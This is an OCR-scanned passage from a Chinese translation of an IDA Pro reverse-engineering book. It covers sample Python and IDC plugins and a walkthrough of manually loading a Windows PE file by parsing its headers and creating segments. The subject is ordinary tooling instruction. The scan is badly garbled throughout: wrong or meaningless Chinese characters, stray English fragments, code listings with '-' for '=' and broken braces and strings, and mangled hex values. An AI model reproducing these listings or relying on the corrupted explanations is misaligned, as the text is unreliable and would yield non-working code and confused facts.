idabook plugin t 的 类 ( 继承 和 目 plugin t), 初始 化 所 有 必需 的 成 员 ,并 定义 实现 插件 行为 的 init, 
term 和 run 函数 。 

















代码 清单 17-4 ”一 个 小 型 Python 插件 


from idaapi import * 


class idabook plugin t(plugin t): 
flags = 0 
wanted name - "IdaBook Python Plugin" 
wanted hotkey - "Alt-8" 
comment - "IdaBook Python Plugin" 
help - "Something helpful" 


def init(self): 
msg("IdaBook plugin init called. n") 
return PLUGIN OK 


def term(self): 
msg("IdaBook plugin term called. n") 


def run(self, arg): 

warning("IdaBook plugin run(%d) called. vn! % arg) 
def PLUGIN ENTRY(): 

return idabook plugin t() 





要 安装 搬 件 ， 只 需 将 脚本 复制 到 <IDADIR>/plugins 目录 中 即 可 。 
以 IDC 编写 的 同一 插件 如 代码 清单 17-5 所 示 。 由 于 IDC 没 有 定义 与 插件 有 关 的 基 类 ， 因 此 
我 们 需要 创建 一 个 类 ， 以 定义 插件 所 需 的 所 有 元 素 ， 同 时 需要 确保 正确 命名 每 个 元 素 。 














(D 参见 http:/www.hexblog.com/?p=120。 
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代码 清单 17-5 一 个 小 型 IDC 插件 


#include «idc.idc» 
class idabook plugin t { 


idabook plugin t() { 
this.flags = 0; 
this.wanted name - "IdaBook IDC Plugin"; 
this.wanted hotkey = "Alt-9"; 
this.comment - "IdaBook IDC Plugin"; 
this.help = "Something helpful"; 

j 


init() 1 
Message("IdaBook plugin init called nii: 
return PLUGIN OK; 


j 


term() 1 
Message("IdaBook plugin term called. nii: 


run(arg) { 
Warning("IdaBook plugin run(%d) called. Wn", arg); 
} 


static P LUGIN ENTRY() 1 
return idabook plugin t(); 
Í 


与 Python 示例 一 样 ，PLUGIN_ENTRY KAH FEJER Inf EAS —- SES E, ， 要 安装 
插件 ， 只 需 将 .idc 文件 复制 到 <IDADIR>/plugins 目录 中 即 可 。 





17.8 小结 


虽然 随 着 脚本 化 插件 的 出 现 ， 你 可 以 暂时 不 必 深 入 研究 SDK， 但 是 如 果 脚 本 无 法 满足 你 扩 
展 IDA 功能 的 需求 ， 你 自然 会 想到 IDA 插件 。 此 外 ， 实 际 上 ， 除 非 你 面临 挑战 ， 需 要 对 IDA 不 
认识 的 文件 格式 进行 逆向 工程 ， 或 者 对 IDA 没有 处 理 需 模块 的 机 需 语 言 进行 送 向 工程 ， 否 则 ， 
插件 可 能 是 唯一 需要 你 研究 的 编译 扩展 。 

但 是 ， 在 下 面 两 章 中 ， 我 们 将 继续 探讨 IDA SDK 的 功能 ， 了 解 你 可 以 构建 用 于 IDA 的 其 他 
类 型 的 模块 : 加 载 硕 模块 和 处 理 需 模块 。 














一 天 ， 你 突然 发 现 自己 已 经 成 为 IDA 专家 了 。 这 时 ， 你 可 能 会 细 细 品味 成 功 的 味道 ， 
或 者 会 “哀叹 ”一 个 事实 : 从 今 以 后 ， 你 会 经 常 受到 人 们 的 打搅 ， 他 们 会 向 你 询问 某 
个 文件 的 用 途 。 最 终 ， 也 许 是 因为 他 们 的 问题 ， 也 许 只 是 因为 你 喜欢 使 用 IDA. 打开 你 所 能 发 现 
的 几乎 每 一 个 文件 ， 你 将 会 遇 到 如 图 18-1 所 示 的 对 话 框 。 18 





3 Load a new file ajx] 
















Processor type 


[Inte 80x85 processors: metapc *Y | Set | 


Analysis 


Loading segment [oxo0000000 
[v Enabled 
Loading offset [oxoo000000 [« Indicator enabled 


Options 


vw I 
[v Create segments Kernel oations 1 


hd Load as code segment 








RI Rename DLL entries 
mil mer m Kernel aations 2 


[v Filisegmentaaps 


[^ Loadinaoptions Processor options | 


D Create FLAT group 


System DLL directory [C:Windows 





图 18-1 加 载 一 个 二 进 制 文件 








这 是 IDA 的 标准 “文件 加 载 ” 对 话 框 ,不 过 存在 一 个 小 问题 ( 从 用 户 的 角度 看 ) 已 识别 的 
文件 类 型 列表 中 仅 包 含 一 个 条 目 ， 即 二 进 制 文件 ， 这 表示 IDA 安 流 的 所 有 加 载 右 模块 部 无 法 识 
别 你 想 要 加 载 的 文件 的 格式 。 笠 而 你 至 少 知道 你 所 处 理 的 机 咒语 言 (你 至 少 知 道 这 个 文件 是 怎么 
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来 的 吧 )， 并 且 能 选择 合适 的 处 理 表 类 型 。 遇 到 这 种 情况 ， 你 所 能 做 的 也 只 有 这 些 了 。 
在 本 章 中 ， 我 们 将 讨论 IDA 用 来 帮助 你 了 解 它 无 法 识别 的 文件 类 型 的 功能 。 前 和 完 ， 我 们 将 
手动 分 析 二 进 制 文件 格式 ， 然 后 以 此 为 基础 ， 开 发 你 目 己 的 IDA 加 载 带 模块 。 


18.1 未 知 文件 分 析 


有 无 数 的 文件 格式 可 用 于 存储 可 执行 代码 。IDA 自 带 了 一 些 加 载 器 模块 ,可 识别 许多 常见 的 
文件 格式 , 但 是 , 文件 格式 日 益 增 多 ，IDA 无 法 为 它们 都 提供 加 载 天 模块 。 二 进 制 映像 可 能 包含 
为 特定 的 操作 系统 而 格式 化 的 可 执行 文件 、 提 取 目 通信 式 系统 的 ROM 映像 、 提 取 目 闪存 更 新 的 
固件 映像 或 是 提取 自 网 络 数据 包 的 机 咒语 言 源 代码 块 。 这 些 映像 的 格式 可 能 取决 于 操作 系统 ( 可 
执行 文件 )、 目 标 处 理 器 和 系统 体系 结构 ( ROM 映像 )， 也 可 能 与 任何 事物 都 无 关 ( 散 入 在 应 用 
层 数 据 中 的 破解 程序 shellcode )。 

假设 处 理 右 模块 能 够 反 汇 编 未 知 的 二 进 制 文件 的 人 代码， 那么 在 告诉 IDA 这 个 二 进 制 文件 的 
哪些 部 分 代表 代码 ， 哪 些 部 分 代表 数据 之 前 ， 你 需要 正确 安排 文件 映像 在 IDA 数据 库 中 的 位 置 。 
对 多 数 处 理 硕 而 言 ， 使 用 二 进 制 格式 加 载 一 个 文件 ,你 将 只 得 到 一 个 文件 内 容 , 这 些 内 容 构成 一 
个 以 地 址 0 开头 的 段 ， 如 代码 清单 18-1 所 示 。 


代码 清单 18-1 以 二 进 制 模式 加 载 的 PE 文件 的 前 几 行 
































seg000:00000000 db 4Dh ; M 
seg000:00000001 db 5Ah ; Z 
seg000:00000002 db 90h ; É 
seg000 : 00000003 db 0 
seg000 : 00000004 db 3 
seg000 : 00000005 db 0 
seg000 : 00000006 db 0 
seg000 : 00000007 db 0 


有 时 候 , 根据 所 选 处 理 器 模块 的 复杂 程度 ，IDA 可 能 会 进行 少量 反 汇 编 。 例 如 ， 如 果 所 选 的 
Ak os 1 CN SN lb bg , Beo] ROM 映像 的 布局 做 出 假设 ,这 时 就 会 出 现 上 述 情况 ,Andy 
Whittaker 为 那些 对 这 类 应 用 程序 感 兴趣 的 读者 创建 了 一 个 完美 的 视频 教程 ”说明 如 何 逆 向 工程 
Siemens C166 微 处 理 带 应 用 程序 的 二 进 制 映像 。 

分 析 二 进 制 文件 时 ， 你 肯定 需要 尽 可 能 多 地 收集 与 该 文件 有 关 的 资源 。 这 些 资 源 包 括 CPU 
参考 文献 、 操 作 系 统 参 考 文献 、 系 统 设计 文档 ， 以 及 通过 调试 或 硬件 辅助 CU $8 Pres ) 分 析 
获得 的 内 存 布局 信息 。 

在 下 一 节 中 ， 为 了 举例 方便 ， 我 们 假设 IDA 无 法 识别 Windows PE 文件 格式 。PE 是 一 种 众 
所 周知 的 文件 格式 ， 许 多 读者 都 熟悉 它 。 更 重要 的 是 ， 有 大 量 详 细 介 绍 PE 文件 结构 的 文档 可 供 
我 们 使 用 ， 这 使 得 分 析 任何 PE 文件 都 会 比较 简单 。 





























(D 参见 http://www.andywhittaker.com/ECU/DisassemblingaBoschME755/tabid/96/Default.aspx o 
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18.2 ”手动 加 载 一 个 Windows PE 文件 


如 果 能 够 找到 与 某 个 文件 所 使 用 的 格式 有 关 的 文档 资源 , 那么 , 当 你 将 这 个 文件 与 一 个 IDA 
数据 库 关 联 起 来 时 ， 你 面临 的 困难 会 大 大 降低 。 代 码 清单 18-1 显示 了 一 个 以 二 进 制 文件 加 载 到 
IDA 中 的 PE 文件 的 前 几 行 代码 。 既 然 无 法 从 IDA 获得 帮助 , 我 们 求助 于 PE 规范 ?, 该 规范 指出 : 

-个 有 效 的 PE 文件 应 以 一 个 有 效 的 MS-DOS 头 部 结构 开头 , 而 一 个 有 效 的 MS-DOS 头 部 结构 则 
以 2 字 节 签名 4Dh 5Ah (MZ) 开头 ， 如 代码 清单 18-1 的 前 两 行 所 示 。 

这 时 ， 我 们 需要 了 解 MS-DOS 头 部 的 布局 。PE 规范 表明 : 文件 中 偏 移 量 为 0x3C 的 位 置 的 
4 字 节 值 是 我 们 需要 找到 的 下 一 个 头 部 (PE 头 部 ) 的 偏 移 量 。 你 可 以 采用 两 种 方法 细 分 MS-DOS 
头 部 的 字段 : 为 MS-DOS 头 部 中 的 每 个 字段 定义 适当 大 小 的 数据 值 ， 或 者 利用 IDA 的 结构 体 创 
建功 能 ， 定 义 和 应 用 一 个 符合 PE 文件 规范 的 IMAGE DOS HEADER 结构 体 。 使 用 后 一 种 方法 可 以 得 
到 下 面 的 代码 段 ( 有 所 修改 ): 





























seg000:00000000 dw 5A4Dh ; e magic 
seg000 : 00000000 dw 90h ; e cblp 
sego00:00000000 dw 3 ;© D 
seg000:00000000 dw 0 > ecrit 
Seg000:00000000 dw 4 ; e cparhdr 
seg000:00000000 dw 0 ; e minalloc 
seg000:00000000 dw OFFFFh ; e maxalloc 
seg000:00000000 dw 0 ; e SS 
seg000:00000000 dw OB8h ; e sp 
seg000:00000000 dw 0 ; e csum 
seg000 : 00000000 dw 0 ; eip 
seg000:00000000 dw 0 3 Gus 
seg000:00000000 dw 40h ; e lfarlc 
seg000 : 00000000 dw 0 ; e ovno 
Seg000: 00000000 dw 4 dup(O) ; e res 
seg000:00000000 dw 0 ; e oemid 
seg000:00000000 dw 0 ; e oeminfo 
Seg000:00000000 dw OAh dup(0) ; e res2 
segO000: 00000000 dd 80h 0; e lfanew 


e lfanew 字段 ( 9 ) 的 值 为 80hn， 表 示 你 应 该 可 以 在 数据 库 的 偏 移 量 为 80n( 128 e ) 的 位 
置 找到 一 个 PE 头 部 。 分 析 偏 移 量 为 80h 的 位 置 的 字 节 ,可 以 确定 这 个 PE 头 部 的 约 数 50n 45h( PE ), 
并 在 数据 库 的 偏 移 量 为 80h 的 位 置 构建 并 应 用 一 个 IMAGE NT HEADERS 结构 体 ( 基于 PE 规范 )。 得 
到 的 IDA 列表 的 一 部 分 如 下 所 示 : 





seg000:00000080 dd 4550h 
seg000:00000080 dw 14Ch 
seg000: 00000080 dw 4 

seg000: 00000080 dd 47826AB4h 


; Signature 

0; FileHeader.Machine 

©; FileHeader.NumberOfSections 
; FileHeader.TimeDateStamp 


CD 参见 http://www.microsoft.com/whdc/system/platform/firmware/PECOFF.mspx ( 需 接受 EULA )。 
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seg000:00000080 dd oEooh ; FileHeader.PointerToSymbolTable 
seg000:00000080 dd OFBh ; FileHeader.NumberOfSymbols 
seg000: 00000080 dw OEOh ; FileHeader.SizeOfOptionalHeader 
Seg000: 00000080 dw 307h ; FileHeader.Characteristics 
seg000: 00000080 dw 10Bh ; OptionalHeader.Magic 
seg000: 00000080 db 2 ; OptionalHeader.MajorLinkerVersion 
seg000: 00000080 db 38h ; OptionalHeader.MinorLlinkerVersion 
seg000: 00000080 dd 600h ; OptionalHeader.SizeOfCode 
seg000: 00000080 dd 400h ; OptionalHeader.SizeOfInitializedData 
seg000: 00000080 dd 200h ; OptionalHeader.SizeOfUninitializedData 
seg000: 00000080 dd 1000h ©; OptionalHeader.AddressOfEntryPoint 
seg000: 00000080 dd 1000h ; OptionalHeader.BaseOfCode 
seg000: 00000080 dd 0 ; OptionalHeader.BaseOfData 
seg000: 00000080 dd 400000h ©; OptionalHeader.ImageBase 
seg000:00000080 dd 1000h @; OptionalHeader.SectionAlignment 
seg000:00000080 dd 200h ©; OptionalHeader.FileAlignment 


前 面 的 代码 和 讨论 与 第 8 章 中 介绍 的 MS-DOS 和 PE 头 部 结构 有 许多 相似 之 处 。 但是， 在 这 











里 ， 我 们 加 载 文件 时 没有 使 用 PE 加 载 项 ， 而 且 ， 与 第 8 章 不 同 的 是 ， 这 里 的 头 部 结构 对 于 我 们 
成 功 了 解数 据 库 的 其 他 部 分 非常 重要 。 


ME, 我 们 已 经 揭示 了 大 量 有 用 的 信息 , 它们 将 带 助 我 们 进一步 了 解数 据 库 布局 。 首 匈 ，PE 


头 部 中 的 Machine (四 ) 字段 指出 了 与 构建 该 文件 有 关 的 目标 CPU 类 型 。 
表示 该 文件 供 x86 处 理 器 类 型 使 用 。 如 果 这 里 的 机 器 类 型 是 其 他 值 ， 如 1COh C ARMO, 那么 ， 
要 关闭 数据 库 并 重新 开始 分 析 , 并 确保 在 最 初 的 加 载 对 话 框 中 选择 正确 的 处 理 胡 类 型 。 


在 这 个 例子 中 , 值 14Ch 


E 
TS 


加 载 数据 








库 后 ， 你 将 无 法 更 改 该 数据 库 所 使 用 的 处 理 顺 的 类 型 。 

ImageBase ( © ) 字段 显示 已 加 载 文件 映像 的 基本 虚拟 地 址 。 使 用 这 个 信息 ,我们 可 以 将 一 些 
虚拟 地 址 信息 合并 到 数据 库 中 。 使 用 Edit » Segments 》 Rebase Program 菜单 项 ,我 们 可 以 为 程序 
的 第 一 段 指 定 一 个 新 的 基 址 ， 如 图 18-2 Brzn o 





à Rebase the whole program ] 


A] xl 


Please enter the new adcress of the 


first segment of the program 


Target | 0x400000 Së 


[v Fixup the program 


[v Rebase the whole image 





为 程序 指定 一 个 新 的 基 址 


为 当 一 个 文件 以 二 进 制 模式 加 载 时 , IDA 仅 创 建 一 个 段 来 保存 整个 文件 , 所 以 在 当前 的 例 
子 中 ， 只 有 一 个 段 存 在 。 该 对 话 框 中 的 两 个 复 选 框 决定 在 段 被 移动 时 ，IDA 如 何 重 新 定位 ， 以 及 
IDA 是 否 应 移动 数据 库 中 的 每 一 个 段 。 对 于 以 二 进 制 模 式 加 载 的 文件 , IDA 将 无 法 获知 任何 重 定 
位 信息 。 同 样 ， 由 于 程序 中 只 有 一 个 段 ， 默 认 情 况 下 ，IDA 将 重新 设置 整个 映像 的 基 址 。 


图 18-2 
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AddressOfEntryPoint ( O ) 字段 指定 程序 进入 点 的 相对 虚拟 地 址 (RAV ), RAV 是 一 个 相对 
于 程序 基本 虚拟 地 址 的 偏 移 量 ,而 程序 进入 点 表示 程序 中 即将 执行 的 第 一 条 指令 的 地 址 。 在 这 个 
例子 中 ,进入 点 RAV 1000h 表示 程序 将 在 虚拟 地 址 401000n( 400000h+1000h ) 处 开始 运行 。 这 是 
一 条 非常 重要 的 信息 ,， 因 为， 对 于 该 在 数据 库 的 什么 地 方 开始 寻找 代码 , 这 是 我 们 获得 的 第 一 个 
提示 。 但 是 ， 在 查找 代码 之 前 ， 需 要 将 数据 库 的 剩余 部 分 与 相应 的 虚拟 地 址 对 应 起 来 。 

PE {EAA H T” (section ) 来 描述 文件 内 容 与 内 存 范 围 之 间 的 对 应 关系 。 通 过 解析 文件 中 
每 节 的 头 部 ， 我 们 可 以 确定 数据 库 的 基本 虚拟 内 存 布 局 。Number0fSections(〈 昌 ) 字段 指出 一 个 
PE 文件 所 包含 的 节 的 数量 , 这 里 是 4。 再 次 查阅 PE 规范 可 知 , 在 IMAGE NT HEADERS 结构 体 后 面 ， 
紧 跟着 一 个 节 头 部 结构 体 数组 。 这 个 数组 中 的 每 个 元 素 都 是 IMAGE SECTION HEADER 结构 体 , 我 们 
可 以 在 IDA 的 “结构 体 ” 窗 口中 定义 这 些 结构 体 ， 并 将 它 应 用 于 IMAGE NT HEADERS 结构 体 后 面 
的 字 节 (这 里 共 应 用 了 4 次 )。 

在 讨论 如 何 创 建 段 之 前 ， 我 们 还 需要 注意 FileAlignment (@) 和 SectionAlignment (@) 这 
两 个 字段 。 这 两 个 字段 说 明 如 何 对 齐 " 文 件 中 每 节 的 数据 ,以 及 将 数据 映射 到 内 存 中 时 ， 如 何 对齐 
相同 的 数据 。 在 我 们 的 例子 中 ， 每 市 与 文件 中 的 一 个 200h 字 节 偏 移 量 对 齐 。 但 是 ， 在 加 载 到 内 存 
中 时 ， 这 些 节 将 与 能 够 被 1000h 整除 的 地 址 对 齐 。 在 将 一 个 可 执行 映像 存储 到 文件 中 时 ， 使 用 更 
小 的 FileATignment 有 利于 节省 存储 空间 ， 而 较 大 的 SectionAlignment 值 通常 对 应 于 操作 系统 的 
虚拟 内 存 页 面 大 小 。 在 数据 库 中 手动 创建 节 时 ， 了 解 节 如 何 对 齐 可 帮助 我 们 避免 错误 。 

创建 每 节 头 部 后 ， 我 们 有 了 足够 的 信息 ， 可 以 开始 创建 数据 库 中 的 其 他 段 。 对 紧 跟 在 
IMAGE NT HEADERS 结构 体 后 面 的 字 节 应 用 一 个 IMAGE SECTION HEADER 模板 ,将 生成 第 一 个 节 头 部 ， 
并 使 以 下 数据 在 示例 数据 库 中 显示 出 来 : 






































seg000:00400178 db '.text',0,0,0 6; Name 
$eg000:00400178 dd 440h ; VirtualSize 
seg000:00400178 dd 1000h 6; VirtualAddress 
seg000: 00400178 dd 600h ©; SizeOfRawData 

seg000 : 00400178 dd 400h 0; PointerToRawData 
seg000: 00400178 dd 0 ; PointerToRelocations 
seg000: 00400178 dd 0 ; PointerToLinenumbers 
seg000:00400178 dw 0 ; NumberOfRelocations 
seg000: 00400178 dw 0 ; NumberOfLinenumbers 
seg000:00400178 dd 60000020h ; Characteristics 





Name ( 9 ) 字段 表明 这 个 头 部 描述 的 是 .text 节 。 所 有 其 他 字段 都 可 用 于 格式 化 数据 库 ， 但 
这 里 我 们 重点 讨论 3 个 描述 节 布 局 的 字段 。PointerToRawData ( 6 ) 字段 (400h ) 指出 可 以 找到 
节 内 容 的 位 置 的 文件 偏 移 量 。 需 要 注意 的 是 ， 这 个 值 是 文件 对 齐 值 200h 的 整数 倍 。PE 文件 中 的 
节 按 文件 偏 移 量 ( 和 虚拟 地 址 ) 升序 排列 。 由 于 这 个 市 以 文件 偏 移 量 400h 为 起 点 ， 我 们 可 以 得 
出 结论 : 文件 的 第 一 个 400h 字 市 包含 文件 尖 部 数据 。 因 此 ， 虽 然 严 格 来 说 ， 它 们 并 不 构成 市 ， 
但 是 ， 我们 可 以 把 它们 划分 到 数据 库 的 一 节 中 ， 以 强调 它们 之 间 的 人 逻辑 关系 。 














D 对齐 体现 了 一 个 数据 块 的 起 始 地 址 或 偏 移 量 。 这 个 地 址 或 偏 移 量 必须 是 对 齐 值 的 偶数 倍 。 例 如 ， 如 果 数 据 与 200h 
(512) 字 节 边界 对 齐 ， 它 必须 以 一 个 能 够 被 200h 偶数 倍 整 除 的 地 址 (或 偏 移 量 ) 为 起 点 。 
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Edit » Segments » Create Segment 命令 用 于 在 数据 库 中 手动 创建 一 个 段 。 段 创建 对 话 框 如 
图 18-3 所 示 。 


DS 


Start address and end address should be valid. 
End address > Start address 


Segment name | headers "| 
start address | 0x400000 "| C-natation: 
End address | üx400400 "| hex is üx... 


Base oxo *-| in paragraphs 


Class | DATA -] (dass is any text) 
(^ 16-bit segment [ use sparse storage 
Ce 32-bit segment 





图 18-3 ”上段 创建 对 话 框 


在 创建 段 时 ， 你 可 以 为 段 指 定 任 何 名 称 。 这 里 我 们 选择 .headers， 因 为 它 不 可 能 被 用 作文 件 
中 真正 的 市 名 称 , 它 充 分 地 描述 了 市 的 内 容 。 你 可 以 手动 输入 段 的 起 始 (包括 ) 和 结束 (不 包括 ) 
地 址 ， 如 果 你 在 打开 对 话 框 之 前 已 经 指定 了 地 址 范围 ，IDA 将 自动 填写 这 些 地 址 。SDK 的 
segment.hpp 文件 描述 了 段 的 基 值 。 对 于 x86 二 进 制 文件 , IDA 通过 将 段 的 基 值 向 左 移 4 个 位 , EA 
后 在 字 节 上 加 上 但 移 量 ， 从 而 计算 出 字 节 的 虚拟 地 址 (virtual=(base<<4)+offset )。 如 果 不 使 用 
分 段 , 则 应 使 用 基 值 零 。 段 类 别 可 以 用 于 描述 段 的 内 容 。IDA 能 识别 几 个 预定 义 的 类 别名 称 ， 如 
CODE, DATA 和 BSS。segment.hpp 也 描述 了 预定 义 的 段 类 别 。 

遗憾 的 是 ， 创 建新 的 段 会 产生 一 个 “副作用 ”， 即 被 定义 到 段 边界 中 的 任何 数据 ( 如 我 们 前 
面 格式 化 的 头 部 ) 将 被 取消 定义 。 重 新 应 用 前 面 讨论 的 所 有 头 部 结构 体 后 ， 我 们 返回 到 .text 节 
的 头 部 ， 注 意 VirtualAddress ( 9 ) 字段 (1000h) 是 一 个 RAV， 它 指定 应 加 载 段 内 容 的 位 置 的 
内 存 地 址 ，Size0fRawData ( 0 ) 字段 ( 600h ) 指出 文件 中 有 和 多少 字 市 的 数据 。 换 句 话 说， 这 个 特 
殊 的 节 头 部 告诉 我 们 ，.text 市 是 通过 将 文件 偏 移 量 400h 与 9FFh 之 间 的 600h Te OD DI S81 Oe 
地 址 401000h 与 4015FFh 之 间 创 建 而 成 。 

示例 文件 以 二 进 制 模式 加 载 ， 因 此 ，.text 节 的 所 有 字 节 出 现在 数据 库 中 ， 我 们 只 需要 将 它 
们 移动 到 正确 的 位 置 即 可 。 创 建 .headers 节 后 , 在 .headers 节 的 末尾 部 分 , 我 们 可 以 看 到 类 似 于 
下 面 的 代码 : 




















.headers:004003FF db 0 
.headers:004003FF headers ends 
.headers:004003FF 


seg001 : 00400400 
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seg001:00400400 ; Segment type: Pure code 


seg001:00400400 seg001 segment byte public 'CODE' use32 

seg001 : 00400400 assume cs:seg001 

Seg001:00400400 ;org 400400h 

Seg001:00400400 assume es: headers, ss: headers, ds: headers 
seg001 : 00400400 db 55h ; U 


在 创建 .headers WAT, IDA 拆 分 最 初 的 seg000 节 ， 构 成 我 们 指定 的 .neaders 节 和 一 个 新 的 
seg001 市 ， 以 保存 seg000 中 的 剩余 字 节 。 在 数据 库 中 ，.text 节 的 内 容 为 seg001 市 的 前 600h 个 
FP, RREH seg001 市 移动 到 正确 的 位 置 ， 并 确定 .text 市 的 正确 大 小 即 可 。 

创建 .text 节 的 第 一 步 是 将 seg001 移动 到 虚拟 地 址 401000h Ak {EH Edit >» Segments > Move 
Current Segment 命令 为 seg001 指定 一 个 新 的 起 始 地 址 ， 如 图 18-4 所 示 。 

下 一 步 , 我 们 将 通过 Edit > Segments » Create Segment 从 新 移动 的 seg001 AYAT 600h FP 
分 离 出 .text 市 。 用 于 创建 新 节 的 参数 如 图 18-5 所 示 ， 它 们 取 自 节 的 头 部 值 。 

A Vente a nen zement x 


Start address and end address should be valid. 
End address > Start address 




















Segmentname |.text z 
x start address Tome ` c] Cnotation: 
Segment: seg001 End address [0x401600 Di hex is Ox... 


Start address: 0x400400 
End address: 0x4024DE 


Target address | 0x401000 M | 
[v Fix up the relocated segment 
aa | rep | 


图 18-4 ”移动 一 个 段 图 18-5 ”手动 创建 .text 节 


记 住 ， 结 束 地 址 并 不 包含 在 地 址 范围 内 。 创 建 .text 市 将 seg001 分 割 成 新 的 .text o, TI 
文件 的 所 有 剩余 字 节 则 构成 一 个 名 为 seg002 WIT, C KIRE. text 节 的 后 面 。 

回 到 市 头 部 ,可 以 看 到 第 二 个 市 , 构建 成 一 个 IMAGE SECTION HEADER 结构 体 后 ,， 它 的 代码 如 
J 


Base | 0 D in paragraphs 
Class | CODE -] (dass is any text) 


ap 
(* 32-bit segment 


[ oœ | c | oe | 





.headers : 004001A0 db '.rdata',0,0 ; Name 

.headers :004001A0 dd 60h ; VirtualSize 

. headers :004001A0 dd 2000h ; VirtualAddress 

. headers :004001A0 dd 200h ; SizeOfRawData 

. headers : 00400140 dd 0Aooh ; PointerToRawData 

. headers :004001A0 dd O ; PointerToRelocations 
.headers:004001A0 dd O ; PointerToLinenumbers 
.headers:004001A0 dw 0 ; NumberOfRelocations 
.headers :004001A0 dw 0 ; NumberOfLinenumbers 
. headers : 00400140 dd 40000040h ; Characteristics 
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使 用 我 们 创建 .text 节 时 分 析 的 数据 字段 ， 我 们 注意 到 ， 这 个 节 名 为 .rdata， 在 以 文件 偏 移 
量 0A00h 为 起 始 地 址 的 文件 中 占用 200h CA, J- RVA 2000h( 虚拟 地 址 402000h ) 对 应 。 值 
得 注意 的 是 ， 现 在 ， 由 于 已 经 移 走 了 .text 上 段 ， 我 们 不 能 再 轻易 地 将 PointerToRawData 字段 映射 
到 数据 库 中 的 一 个 偏 移 量 。 我 们 需要 以 这 样 一 个 事实 为 依据 : .rdata WBHJPJZEZAERTE . text IH 
内 容 之 后 。 换 言 之 ，.rdata 节 当 前 位 于 seg002 的 前 200h 个 字 节 中 。 或 者 可 以 逆向 创建 这 些 节 . 
首先 创建 在 头 部 定义 的 最 后 一 个 节 ， 最 后 创建 .text 节 。 这 种 方法 先 将 节 放 置 在 其 正确 的 文件 偏 
移 量 位 置 ， 然 后 将 它们 移 到 对 应 的 虚拟 地 址 。 

创建 .rdata 节 的 方法 与 创建 .text 市 的 方法 类 似 。 第 一 步 , 将 seg002 移 到 402000h; 第 二 步 ， 
创建 .rdata 屯 ， 其 地 址 范围 为 402000h~402200h。 

在 这 个 特殊 的 二 进 制 文件 中 定义 的 下 一 个 节 称 为 .bss "0. .bss "NHM ASW. DT 
放置 在 程序 启动 时 需要 初始 化 为 去 的 静态 分 配 的 变量 (如 全 局 变量 )。 具 有 非 云 初始 值 的 静态 变 
量 通 党 被 分 配 到 .data (非常 量 ) 或 .rdata (常量 ) 节 中 。.bss 贡 的 优势 在 于 ， 通 浓 它 不 会 占用 
磁盘 镜像 的 空间 ， 因 为 操作 系统 加 载 融 创建 可 执行 文件 的 内 存 镜像 时 ， 会 为 该 节 分 配 空间 。 本 示 
例 指定 的 .bss 节 如 下 所 示 : 


























.headers:004001C8 db '.bss',0,0,0 ; Name 
.headers:004001C8 dd 40h 0; VirtualSize 
.headers:004001C8 dd 3000h ; VirtualAddress 
.headers : 004001C8 dd 0 ; SizeOfRawData 

. headers :004001C8 dd 0 ; PointerToRawData 

. headers :004001C8 dd 0 ; PointerToRelocations 
. headers :004001C8 dd O ; PointerToLinenumbers 
.headers :004001C8 dw 0 ; NumberOfRelocations 
.headers:004001C8 dw 0 ; NumberOfLinenumbers 
.headers:004001C8 dd oCooo0080h ; Characteristics 





其 中 节 头 部 指出 了 该 节 在 文件 中 的 大 小 ，Size0fRawData@ 为 零 ， 而 该 节 的 Virtual- Size 
为 0x40〈64 ) 字 市 。 要 在 IDA 中 创建 这 个 节 ， 首 先 需 要 在 以 地 址 0x403000 开头 的 地 址 空间 中 创 
建 一 个 间 除 〈 因 为 我 们 没有 文件 内 容 来 填充 该 节 )， 然 后 定义 .bss 来 填补 这 个 间 际 。 创 建 这 个 间 
院 的 最 简单 方法 是 将 二 进 制 文件 的 剩余 的 节 移 到 它们 正确 的 位 置 。 整 个 过 程 完 成 后 ,“ 段 ”窗口 
如 下 所 示 : 




















Name Start End RWX DL Align Base Type Class 
.headers 00400000 00400400? ? ? . . byte 0000 public DATA 

.text 00401000 00401600? ? ? . . byte 0000 public CODE 
.rdata | 00402000 00402200? ? ? . . byte 0000 public DATA 

.bss 00403000 00403040? ? ? . . byte 0000 public BSS Sg 
.idata | 00404000 00404200? ? ? . . byte 0000 public IMPORT ... 


Seg005 ` 00404200 004058DE? ? ? . L byte 0001 public CODE 








为 了 简单 ,我 们 和 省略 了 代码 清单 右 侧 部 分 。 你 可 能 已 经 注意 到 ,， 段 的 结束 地 址 与 随后 段 的 起 
始 地 址 并 不 相 邻 。 这 是 因为 ,在 创建 这 些 段 时 , 使 用 的 是 它们 的 文件 大 小 , 而 没有 考虑 它们 的 虚拟 
大 小 及 所 需 的 任何 节 对 齐 。 为 了 使 我 们 的 段 反映 可 执行 映像 的 真正 布局 , 我 们 可 以 对 每 个 结束 地 
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址 进行 编辑 ， 以 填补 段 之 间 的 任何 间 际 。 

问号 表示 每 个 节 的 权限 位 的 值 未 知 。 对 于 PE 文件 ,这 些 值 通过 每 个 节 头 部 的 Characteristics 
字段 中 的 位 来 指定 。 除 了 通过 IDC 编程 或 使 用 插件 外 ， 你 没有 办 法 为 手动 创建 的 节 指 定 权 限 。 
下 面 的 IDC 语句 对 前 面 代码 清单 中 的 .text 市 设置 执行 权限 . 








SetSegmentAttr(0x401000, SEGATTR PERM, 1); 


遗憾 的 是 , IDC 并 没有 为 每 一 个 被 允许 的 权限 定义 符号 常量 。Unix 用 户 可 以 轻易 记 住 节 的 权 
限 位 ， 它 们 正好 与 Unix 文件 系统 所 使 用 的 权限 位 完全 对 应 。 因 此 ， 读 为 4， 写 为 2， 执 行为 1。 
你 可 以 使 用 按 位 OR 在 一 个 操作 中 设置 几 个 权限 来 组 合 值 。 

手动 加 载 过 程 的 最 后 一 步 是 让 x86 处 理 需 模块 为 我 们 工作 。 一 旦 二 进 制 文件 与 各 种 IDA 
正确 对 应 起 来 ,我 们 就 可 以 返回 我 们 在 头 部 中 发 现 的 程序 人 口 点 (RVA 1000h, 虚拟 地 址 401000h ), 
并 要 求 DA 将 那个 位 置 的 字 节 转换 为 代码 。 如 果 我 们 想 要 IDA 在 “Exports”( 导出 ) 窗口 中 将 该 
地 址 列 为 入 口 点 ， 我 们 必须 以 编程 方式 指定 它 这 样 做 。 下 面 是 一 行 Python 代码 ， 可 用 于 实现 这 
一 目的 : 








AddEntryPoint(0x401000, 0x401000, 'start', 1); 


如 果 以 这 种 方式 调用 该 人 口 点 ，IDA 会 将 其 命名 为 start ， 人 然后 将 其 作为 导出 符号 添加 ， 在 
指定 的 地 址 创建 代码 ， 并 启动 递归 下 降 以 尽 可 能 详细 地 分 解 相关 代码 。 有 关 AddEntryPoint 函数 
的 详细 信息 ， 请 参阅 IDA 的 内 置 帮 助 。 

